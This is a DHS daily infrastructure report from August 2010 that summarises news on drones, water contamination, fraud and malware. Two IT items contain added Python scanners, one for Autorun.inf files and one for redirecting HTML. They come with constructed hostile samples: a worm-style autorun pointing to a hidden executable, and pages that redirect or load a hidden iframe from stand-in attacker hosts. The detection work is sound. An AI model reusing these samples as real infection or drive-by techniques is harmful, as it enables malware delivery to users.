Department of Homeland Security Daily Open Source Infrastructure Report

Friday, August 27, 2010

Complete DHS Daily Report for August 27, 2010

Daily Report

Top Stories

•According to The New York Times, a United States Navy drone wandered into restricted airspace August 2, and flying at 2,000 feet, got within 40 miles of Washington D.C. before operators could stop it. A Navy spokesman could not say August 25 if anyone on the ground was alarmed by the drone. (See item 14)

14. August 25, New York Times – (Maryland; District of Columbia) Navy drone wanders into restricted airspace around Washington. A United States Navy drone wandered into restricted airspace August 2 around Washington D.C. before operators could stop it. A Navy spokesman could not say August 25 if anyone on the ground was alarmed by the drone — officially an MQ-8B Fire Scout Vertical Takeoff and Landing unmanned aerial vehicle — which looks like a small windowless helicopter, and was flying at 2,000 feet. The Navy said the drone got within 40 miles of Washington before operators were able to re-establish communication and guide it back to its base in southern Maryland. The incident resulted in the grounding of all six of the Navy’s Fire Scouts as well as an inquiry into what went wrong. The Navy is calling the problem a “software issue” that foiled the drone’s operators. Navy spokesmen said the Fire Scout, made by Northrop Grumman, was a little more than 1 hour into a test flight operating out of Naval Air Station Patuxent River on the Chesapeake Bay when operators lost its control link. The drone then flew 23 miles on a north-by-northwest course to enter Washington’s restricted airspace. A half-hour later, the Navy spokesmen said, operators re-established control and the drone landed safely back at Patuxent. Source:

•The city of Espanola, New Mexico shut down two wells this week after the state environment department found elevated levels of uranium in the water supply. (See item 33)

33. August 24, Santa Fe New Mexican – (New Mexico) Uranium found seeping into wells. Nature, not man, is the biggest source of uranium contamination in water around Espanola, Pojoaque, Nambe and Santa Fe, New Mexico. Several private water wells around Pojoaque and Nambe have twice tested with uranium levels three to six times higher than the federal recommended levels for safe drinking water. Meanwhile, Espanola shut down two wells this week after the state environment department found elevated levels of uranium in the water supply. The Espanola city manager said the wells will not be a problem in the future. "We plan to shut them off completely and to blend other wells that we do have in this area," he said in a statement. Around Santa Fe, a test of 475 wells last year found several with elevated uranium, but nothing compared to wells tested subsequently in Nambe and Pojoaque. The testing and analysis were part of New Mexico Small Business Assistance project between LANL and the Good Water Company of Santa Fe, which designs, installs and services water-purification systems. High uranium levels found in a half-dozen wells around the Nambe and Pojoaque corridor, between the Rio Grande and the Sangre de Cristo Mountains, mirrored the results of a larger study conducted in 2005 by Santa Fe County and LANL. "One well in the corridor tested with 60 times the EPA maximum contamination level for uranium," said the owner of Good Water Company. The U.S. Environmental Protection Agency set 30 micrograms per liter as the safe drinking-water standard. Wells in the Pojoaque and Nambe corridor measured with uranium levels from less than 30 to 1,800 micrograms per liter, according to a LANL groundwater chemist. Source: News/Uranium-found-seeping-into-wells


Banking and Finance Sector

15. August 25, WSB-TV 2 Atlanta – (Georgia) Police: Sovereign citizen busted with $302 billion in fake bonds. Investigators said a suspect tried to convince a Clayton County police officer that he did not have to follow any Georgia laws because he is a sovereign citizen. The officer pulled over the suspect's Chevy Avalanche in a traffic stop for speeding, but found he had no current tag, registration or insurance. A search of the truck found $108,000 hidden under the cup holders, police said. Then officers located several envelopes containing 12 fake surety bonds. "Basically, it's the U.S. government guaranteeing that this particular money is in the bank," said a police lieutenant who showed an investigative reporter one of the fraudulent documents allegedly worth $100 billion. The monetary total for all 12 fake bonds was $302.7 billion, police said. Investigators believe the suspect was planning to use the documents to attempt to steal houses, which was reported happening in neighboring counties in Georgia. Source:

16. August 25, Worcester Telegram & Gazette – (Massachusetts) Former bank employee gets probation in mortgage scheme. A former bank employee described by his lawyer as an unwitting participant in a mortgage fraud scheme was placed on probation August 25 after admitting in court in Worcester, Massachusetts, that he provided fraudulent financial documents to a mortgage broker. The 31-year-old suspect of Worcester, a former Bank of America employee, was placed on probation for 4 years after pleading guilty to 13 counts of publishing a false financial statement. Prosecutors said that while working at a Bank of America branch in Worcester, the suspect produced 13 verifications of deposit (VODs) that enabled a mortgage broker of Marshfield, a co-defendant in the case, to create fraudulent loan applications resulting in more than $1 million in loans. One of the fraudulent documents indicated a loan applicant had more than $40,000 in her bank account when the account, which had been opened by the suspect, actually contained only $25, according to the assistant attorney general. The two defendants were among five people indicted in 2008 in connection with what prosecutors called a “sophisticated mortgage fraud ring." Source:

17. August 24, WDBJ 7 Roanoke – (Virginia) Area authorities caution: Beware of banking scam. Authorities are warning of a widespread scam in the Rocky Mount and Henry County, Virginia areas that could clean out customers' bank accounts. Sheriff's investigators and police said many of those targeted are members of the Martinsville DuPont Credit Union. Bank customers have been getting calls from an automated voice service claiming their debit card has been compromised. They are then asked to enter their card number in order to speak with the security department. Authorities remind customers never to give out personal banking information over the phone unless the customer placed the call to the banking center directly. Between the credit union and authorities, they have been able to respond quickly, making sure that the few customers who did give out their information did not lose money to the scammers. DuPont officials said the largest loss appears to be around $600 as of August 25. Source:,0,2566279.story

18. August 24, Associated Press – (Georgia) Man accused of threatening Aflac building in court. A man accused of threatening to fly a plane into a Columbus, Georgia insurance building appeared in court August 24. According to an FBI affidavit, federal authorities allege the 61-year-old suspect told an Aflac customer service representative that if a claim was not settled quickly, he would bring a shotgun to the Columbus insurance company, and also that he suggested he would fly a plane into the building. Authorities said it stems from a May 24 phone conversation. Authorities allege the employee cautioned the suspect against what he said, but he repeated it. The suspect was arrested May 27 at his Houston, Texas home. He could face a maximum of 5 years in prison on a charge of extortion/interstate threatening communications. Source:

19. August 24, Aberdeen Press and Journal – (International) Twelve climate-change activists arrested in capital day of protest. Twelve climate-change protesters were arrested during a day of mass action in Edinburgh, Scotland August 23. About 500 activists set up a so-called Camp for Climate Action behind the Royal Bank of Scotland (RBS) headquarters in the capital 5 days ago to protest against its funding of fossil fuel companies that they say are destroying the planet. The bank, almost wholly owned by the U.K. government, advised many staffers to work from home. Activists brought traffic to a halt after they created an “oil slick” on two of the main routes into the city. Lothian and Borders Police said a substance similar to diesel or vegetable oil was poured on the A720 Edinburgh bypass at Bankhead, and the westbound A8. Activists were criticized by police and politicians, who said a peaceful protest had taken a sinister turn. Five other activists were charged after a protest at the capital headquarters of Forth Energy, the firm behind controversial plans to build a renewable energy plant in Dundee. Source:

Information Technology

51. August 26, IDG News Service – (International) Scammers hit Twitter, Facebook, send free iPad spam. Facebook and Twitter users are complaining about their accounts being compromised and then being used to spam friends with suspicious "free iPad offers." Twitter warned users of the scam August 25, saying it was resetting passwords of affected users. "If you've received a message promising you a new iPad, not only is there no iPad, but also your friends have been hacked," Twitter said. The scam is also hitting Facebook users, according to a company spokesman. "It's affecting an extremely small percentage of people on Facebook, but we take all threats seriously," he said via e-mail. A researcher discovered late August 25 that his Twitter account had been used to send direct messages to his contacts. He noted the scammers sent direct messages to his friends that said, "u have to check out this website its glitchin right now and sending out ipads to everyone for free!" He said the messages continued even after he changed his password, which suggests the attackers retained access through something other than the password alone. The messages his friends received contained a link to a Web site that asks for personal information, and then directs the user to a variety of promotional offers from legitimate companies such as Netflix, the Doubleday Book Club, and Columbia House DVD. Online marketing programs pay cash for Web traffic, and hackers have found that by phishing victims and then using the harvested credentials to break into legitimate Twitter and Facebook accounts, they can earn money. Source:

52. August 26, Help Net Security – (International) 25% of new worms are designed to spread through USB devices. In 2010, 25 percent of new worms have been specifically designed to spread through USB storage devices connected to computers, according to PandaLabs. These types of threats can copy themselves to any device capable of storing information such as cell phones, external hard drives, DVDs, flash memories and MP3/4 players. The technique is highly effective. With survey responses from more than 10,470 companies across 20 countries, it was revealed that about 48 percent of SMBs (with up to 1,000 computers) admit to having been infected by some type of malware over the last year. And 27 percent confirmed the source of the infection was a USB device connected to a computer. "There are now so many devices on the market that can be connected via USB to a computer," said PandaLabs' technical director. "This is convenient for users, but since all these devices have memory cards or internal memory, it is feasible they could be carrying a virus." There is an increasing amount of malware which, like the dangerous Conficker worm, spreads via removable devices and drives such as memory sticks, MP3 players and digital cameras. The basic technique used is as follows: Windows uses the Autorun.inf file on these drives or devices to know which action to take whenever they are connected to a computer. This file, which sits in the root directory of the device, offers the option to automatically run part of the content on the device when it connects to a computer. By modifying Autorun.inf with specific commands, cyber-crooks can enable malware stored on the USB drive to run automatically when the device connects to a computer, thus immediately infecting the computer in question. The same file can also rewire the "Open" and "Explore" actions on the drive icon, so that a user who merely double-clicks the drive in Explorer launches the payload even when AutoRun itself has been disabled. Source:
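The Autorun.inf mechanism described above can be checked for mechanically: Windows only acts on a handful of keys, and those keys are exactly what an incident responder looks at when a USB stick is suspected of carrying a worm. The script below is an added illustration written for this report item, not PandaLabs' code. It parses the [autorun] section tolerantly (worm-written files are often padded with junk lines, NUL bytes or duplicate sections to break naive INI readers), and flags the directives that cause execution: open= and shellexecute=, which run on insertion where AutoRun is honored, and shell\<verb>\command plus a shell= override, which hijack the drive's double-click and context-menu actions. The two sample files are constructed for the example; the RECYCLER path and the SID-like folder name in the worm-style sample are placeholders that mimic the pattern worms use, not a real capture. On Windows 7, and on earlier versions with the AutoRun restriction update applied, Autorun.inf is no longer executed automatically from USB storage, so the check is most useful for spotting infected media and for hosts that still honor it.

```python
"""Inspect an Autorun.inf for directives that would run code from removable
media. Added example for this report item; not PandaLabs' code."""
import re
from typing import List, Tuple

# Keys that make Windows run something outright when the device is inserted.
LAUNCH_KEYS = {"open", "shellexecute"}
# shell\<verb>\command rewires the verbs Explorer offers on the drive icon.
SHELL_COMMAND_RE = re.compile(r"^shell\\([^\\]+)\\command$")
EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js", ".dll")
# Folders where worms park their payload because users rarely browse them.
HIDEOUTS = ("recycler", "recycled", "$recycle.bin", "system volume information")


def parse_autorun(text: str) -> List[Tuple[str, str]]:
    """Collect key=value lines from every [autorun] section, in order.

    Deliberately tolerant: the file may be padded with junk lines, NUL bytes
    or repeated sections to confuse scanners, and a strict INI reader would
    give up on exactly the files worth examining."""
    pairs: List[Tuple[str, str]] = []
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip("\x00 \t\r")
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            pairs.append((key.strip().lower(), value.strip().strip('"')))
    return pairs


def target_findings(key: str, target: str) -> List[str]:
    """Heuristics on the path a launch directive points at."""
    t = target.lower()
    program = t.split()[0] if t.split() else ""   # drop any arguments
    out: List[str] = []
    if program.endswith(EXEC_EXT):
        out.append(f"{key} runs an executable: {target}")
    if any(t.startswith(h) or ("\\" + h) in t for h in HIDEOUTS):
        out.append(f"{key} target is hidden in a system folder: {target}")
    if re.search(r"\.[a-z0-9]{1,4}\.[a-z0-9]{1,4}$", program):
        out.append(f"{key} target uses a double extension: {target}")
    return out


def assess_autorun(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing would execute."""
    findings: List[str] = []
    for key, value in parse_autorun(text):
        if key in LAUNCH_KEYS:
            findings.append(f"launch directive {key}={value}")
            findings += target_findings(key, value)
        elif SHELL_COMMAND_RE.match(key):
            verb = SHELL_COMMAND_RE.match(key).group(1)
            findings.append(f"Explorer verb '{verb}' rewired to {value}")
            findings += target_findings(key, value)
        elif key == "shell":
            # Makes the rewired verb the default action for a double-click on the drive.
            findings.append(f"default verb overridden: shell={value}")
        elif key == "useautoplay" and value == "1":
            findings.append("UseAutoPlay=1 forces AutoPlay handling of the device")
    return findings


def is_suspicious(text: str) -> bool:
    return bool(assess_autorun(text))


# Constructed samples for the example (not real-world captures).
BENIGN = """[autorun]
label=Vacation photos
icon=photos.ico
"""

WORM_STYLE = """[AutoRun]
;kjh3g4kjh34gkjh  <- padding that a naive INI reader may choke on
open=RECYCLER\\S-1-5-21-0000000000-0000000000-000000000-1000\\vshost.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
shell\\open=&Open
shell\\open\\command=RECYCLER\\S-1-5-21-0000000000-0000000000-000000000-1000\\vshost.exe
shell\\explore\\command=RECYCLER\\S-1-5-21-0000000000-0000000000-000000000-1000\\vshost.exe
shell=open
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("worm-style", WORM_STYLE)):
        print(name, "->", assess_autorun(sample) or "no launch directives")
```

Run against the root of a mounted device (read the file in binary and decode with errors="ignore", since worm-written files are rarely clean text). Anything the script reports on a USB stick deserves a look at the referenced file, and the shell= plus shell\open\command pairing is the signature to prioritize, because it works even where AutoRun has been turned off.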

53. August 26, – (International) Scareware hits U.K. airport terminals. Security experts are warning users to exercise extreme caution when using publicly available Internet access terminals after malware was discovered on a terminal in a U.K. airport lounge. In a blog post, a Symantec Hosted Services senior software engineer explained that on a recent trip he noticed one of the Internet-connected PCs in a “large airport in England” was infected with fake anti-virus software known as "Defense Center Installer." Such malware claims a user is infected with a virus, and encourages them to buy the full version of the software to clean the fictitious infection, he explained. "It's also common for this type of malware to try to uninstall legitimate anti-virus software, including Symantec's Norton Anti-Virus." He added that the scareware had also used Windows APIs to manipulate the information displayed in Windows Security Center, making it look like Windows is claiming there is no AV installed. The engineer argued that far more malicious threats than scareware could be present at such Internet-connected terminals, including keyloggers, which could harvest sensitive user account information such as Web mail or online banking log-ins. Source:

54. August 26, The Register – (International) Apple kills Jailbreakme Mac bug. Apple has purged Mac OS X of a browse-and-get-hacked vulnerability that first came to light 3 weeks ago, when the popular Jailbreakme service used it to root fully patched versions of the iPhone. The buffer overflow flaw in an OS component that parses fonts was one of 13 vulnerabilities Apple fixed in an update released August 24. It allowed attackers to remotely execute malicious code on vulnerable machines simply by getting the user to view a booby-trapped PDF document. A related bug was patched 2 weeks ago in iOS, which powers the iPhone, the iPad and the iPod Touch. The vulnerability in the latter devices was being actively exploited by Jailbreakme, allowing users to jailbreak their device by doing nothing more than visiting the site and flicking a slider. There were no reports of the vulnerability being exploited in OS X. The update also patched a hole in CFNetwork that allowed attackers to bypass secure sockets layer protection, and it fixed a variety of third-party components including ClamAV, Samba and PHP. Source:

55. August 26, The New New Internet – (International) Corporate ID theft used to jack code signing certificate. Security researchers with F-Secure have found a new set of spammed malware signed with an Authenticode code-signing certificate obtained through corporate identity theft. Signed malware is not new; what is new here is that the certificate request carried legitimate contact information for a real company. “This is something we’ve seen before,” the researchers write. "But this case seemed odd because the contact information appeared very genuine. Usually a valid but malicious certificate uses clearly bogus or dubious details.” The use of legitimate contact information is particularly worrisome because it makes it difficult for certification authorities to discern legitimate requests. “When scammers have access to a company’s e-mail, it is very difficult for a CA to verify whether the request coming from the company is genuine,” the researchers write. "Mistakes will also happen in the future. It is very likely that we’ll see more of these cases in which an innocent company with a good reputation is used as a proxy for malware authors to get their hands on valid certificates.” The practical consequence is that a valid signature on a binary proves only that someone controlling the named company's e-mail completed the CA's validation, not that the company wrote the code. Source:

56. August 25, DarkReading – (International) Careful with that third-party Web widget. Small- and mid-sized businesses use a lot of third-party Web applications: It saves them money and allows them to embed expertise that they might not otherwise have. But it can also open up their business and their customers to attack. The recent Network Solutions incident shows how this practice can go very wrong: Ten days ago, the Internet domain provider learned that a Web-services widget that it had placed on at least 120,000 parked Web pages was infecting visitors with malware. The firm reportedly obtained the widget, known as the Small Business Success Index, from the third-party widget directory WidgetBox. As more businesses continue to use third-party code in their Web sites and import content from other sites, the security of their visitors increasingly relies on others: a script or iframe pulled from another domain runs with the full trust of the embedding page, so whoever controls that domain controls what the page's visitors receive. "Over the past five years, Web 2.0 has taken the world by storm," says the chief technology officer of Web scanning firm Dasient. "As a Web site administrator, your security is actually dependent on a bunch of third parties, so you should make sure to monitor all your code and widgets." Network Solutions is not the only Internet company to inadvertently host malicious code on its Web site. A year ago, The New York Times infected an unknown number of visitors with a rogue program after fraudsters posed as a legitimate advertiser and submitted a virus-laden ad to the news service. Other Web sites, such as BusinessWeek and Fox News, have had to deal with similar problems. Source:

57. August 25, Sophos – (International) Malicious spammers launch major fake anti-virus attack. SophosLabs' worldwide network of e-mail-monitoring stations has seen a tidal wave of malicious messages being spammed out with an attachment that redirects users' Web browsers to a fake anti-virus attack. The e-mails have subject lines such as: Parking Permit and/or Benefit Card Order Receipt; You're invited to view my photos!; Appointment Confirmation; Your Bell e-bill is ready; Your Vistaprint Order Is Confirmed; and Vistaprint Canadian Tax Invoice. Opening the attached HTML file, however, redirects the Web browser to a hacked Web site containing a malicious iFrame (which Sophos detects as Troj/Iframe-FK). This, in turn, loads scripts from other Web sites that deliver a fake anti-virus attack that Sophos detects as Mal/FakeAV-EI. Mal/FakeAV-EI often disguises itself as a bogus version of McAfee VirusScan. Because the attachment itself carries no executable, only a redirect, it passes through filters that look for binaries; the tell-tale signs are a meta refresh or a script that rewrites the browser's location as soon as the file opens. Source:
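Both the Sophos item above (an HTML attachment that bounces the browser to a hacked site carrying a hidden iframe) and the widget incident in item 56 (third-party script or iframe content injected into otherwise legitimate pages) come down to the same question for a mail gateway or a site owner: does this HTML silently hand the visitor to another origin? The scanner below is an added example written for these two items; it is not Sophos' or Dasient's code. It walks the HTML with Python's standard-library parser and reports meta refreshes, location-rewriting script, external script sources, and iframes that are sized to 0 or 1 pixel or hidden with CSS, which is how drive-by iframes are usually planted. The three HTML samples are constructed for the example and use reserved .example domains rather than real sites.

```python
"""Flag HTML that silently hands the browser to another site: meta refresh,
script-driven redirects, external scripts and hidden iframes. Added example
for the Sophos and third-party-widget items; not Sophos' or Dasient's code."""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional

# <meta http-equiv="refresh" content="0;url=...">
META_REFRESH = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.IGNORECASE)
# window.location = "...", location.href = '...', location.replace("..."), etc.
SCRIPT_REDIRECT = re.compile(
    r"(?:window|document|top|self|parent)?\.?location(?:\.href|\.replace|\.assign)?"
    r"\s*(?:=|\()\s*['\"]([^'\"]+)['\"]")
# CSS that keeps an iframe out of sight while it still loads.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px",
    re.IGNORECASE)


def _tiny(value: Optional[str]) -> bool:
    """True for width/height attributes of 0 or 1 pixel (the classic drive-by iframe)."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


class RedirectFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict[str, str]] = []
        self._in_script = False

    def _add(self, kind: str, url: str) -> None:
        self.findings.append({"kind": kind, "url": url.strip()})

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_REFRESH.match(a.get("content", ""))
            if m:
                self._add("meta-refresh", m.group(1))
        elif tag == "iframe":
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or bool(HIDDEN_CSS.search(a.get("style", ""))))
            self._add("hidden-iframe" if hidden else "iframe", a.get("src", ""))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self._add("external-script", a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies over verbatim, so inline redirects land here.
        if self._in_script:
            for m in SCRIPT_REDIRECT.finditer(data):
                self._add("script-redirect", m.group(1))


def scan_html(text: str) -> List[Dict[str, str]]:
    """Return every redirect/inclusion found, in document order."""
    finder = RedirectFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


def is_redirecting(text: str) -> bool:
    """True when the page would move the visitor somewhere without a click."""
    return any(f["kind"] in ("meta-refresh", "script-redirect", "hidden-iframe")
               for f in scan_html(text))


# Constructed samples for the example; the .example domains are reserved names.
ATTACHMENT = """<html><head><title>Parking Permit</title>
<meta http-equiv="refresh" content="0;url=http://compromised.example/in.php">
</head><body>
<script type="text/javascript">
window.location.href = "http://compromised.example/in.php";
</script>
<p>Loading your receipt...</p>
</body></html>"""

COMPROMISED_PAGE = """<html><body><h1>Welcome to our shop</h1>
<iframe src="http://exploit-kit.example/load.php" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>"""

BENIGN_MAIL = """<html><body><p>Your order is confirmed.</p>
<a href="https://shop.example/orders/123">View order</a>
<img src="https://shop.example/logo.png" width="120" height="40"></body></html>"""

if __name__ == "__main__":
    for name, doc in (("attachment", ATTACHMENT), ("page", COMPROMISED_PAGE),
                      ("benign", BENIGN_MAIL)):
        print(name, "->", scan_html(doc) or "nothing suspicious")
```

At a mail gateway the rule is simple: an HTML attachment that redirects on open has no legitimate reason to exist and can be quarantined on the first meta-refresh or script-redirect finding. For a site owner the same scan, run against a fetched copy of each page, gives the change-monitoring the Dasient CTO recommends: any new external-script or iframe entry against a known baseline of widget sources is worth a human look.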

58. August 25, – (International) Cisco issues security advisory for UC products. Cisco has released a security advisory to address vulnerabilities in a pair of its products. The company said that the update will plug security flaws in its Unified Communications Manager and Unified Presence lines. The United States Computer Emergency Readiness Team (US-CERT) is advising administrators to review and install both updates. For the Unified Communications Manager, the update will patch a pair of security flaws that could allow denial-of-service attacks. Cisco said that an attacker could use a specially crafted Session Initiation Protocol (SIP) message to trigger a processing error and bring down voice services on a targeted system. The Unified Presence patch also addresses SIP-handling denial-of-service vulnerabilities within the messaging platform. Cisco said that it has yet to receive any reports of exploitation in the wild. The company said that there are no known workarounds for the vulnerabilities, though a free update has been posted. Administrators can obtain the updates through their IT service providers or through the company's technical assistance center. Source:

Communications Sector

59. August 25, Des Moines Register – (Iowa) City of West Des Moines e-mail went down, should be back Monday. The city of West Des Moines, Iowa, had trouble with e-mail the week of August 23, but officials said the problem should be fixed by August 30. The city’s aging e-mail server crashed August 20, just as city staff were working to install a new server. The system’s demise was hastened by the proliferation of smartphones among city staff because the phones constantly check in with the server. “That constant traffic just brought it to its knees, so to speak,” the city’s IT director said. New inboxes for city staff were up and running by August 23, but all previous e-mail was inaccessible. Replacing the servers had been in the city’s budget this year, but had to be dropped as a cost-saving measure, the IT director said. When city staff realized a month ago the server would probably go down, they started to replace it anyway. The old one crashed as they were working on the new one. Residents who have not received a response to an e-mail to city staff should try to call, just in case their e-mail was lost or never reached the recipient. Source:

60. August 25, Colorado Springs Gazette – (Colorado) Man arrested for stealing thousands of feet of copper wiring. Police in Colorado Springs, Colorado, arrested a man August 24 on suspicion of stealing thousands of feet of copper wiring. The 20-year-old suspect admitted taking more than 3,500 feet of copper wiring from the back lot of Qwest Communications, 2264 Naegele Road in west Colorado Springs, police said. Police first noticed something might be awry in the area when they spotted a vehicle backed into an alley behind the Qwest building. Looking closer, police found a woman and child in the vehicle, along with thousands of feet of copper wiring laying nearby. Much of it had been cut into smaller spools. A short time later, police spotted the suspect in front of the business. He was booked into the El Paso County jail on suspicion of theft, second degree criminal trespass, and possessing burglary tools. Source:

61. August 25, WGAL 8 Lancaster – (Pennsylvania) Internet outage hit most state Web sites. It appears an Internet outage that affected most Pennsylvania government Web sites for hours August 25 has been fixed. Some of the key sites affected were: (1) the state unemployment compensation system (the unemployed could not file for claims online); and (2) the Department of Revenue (taxpayers could not make payments online). There is still no word at this time as to what caused the problem. Some state sites with independent servers, such as the Department of Public Welfare, Department of Transportation and the state's Megan's Law Web site, were able to remain up and running during the outage. The state's Internet access is handled by the office of information technology in the office of administration. Source: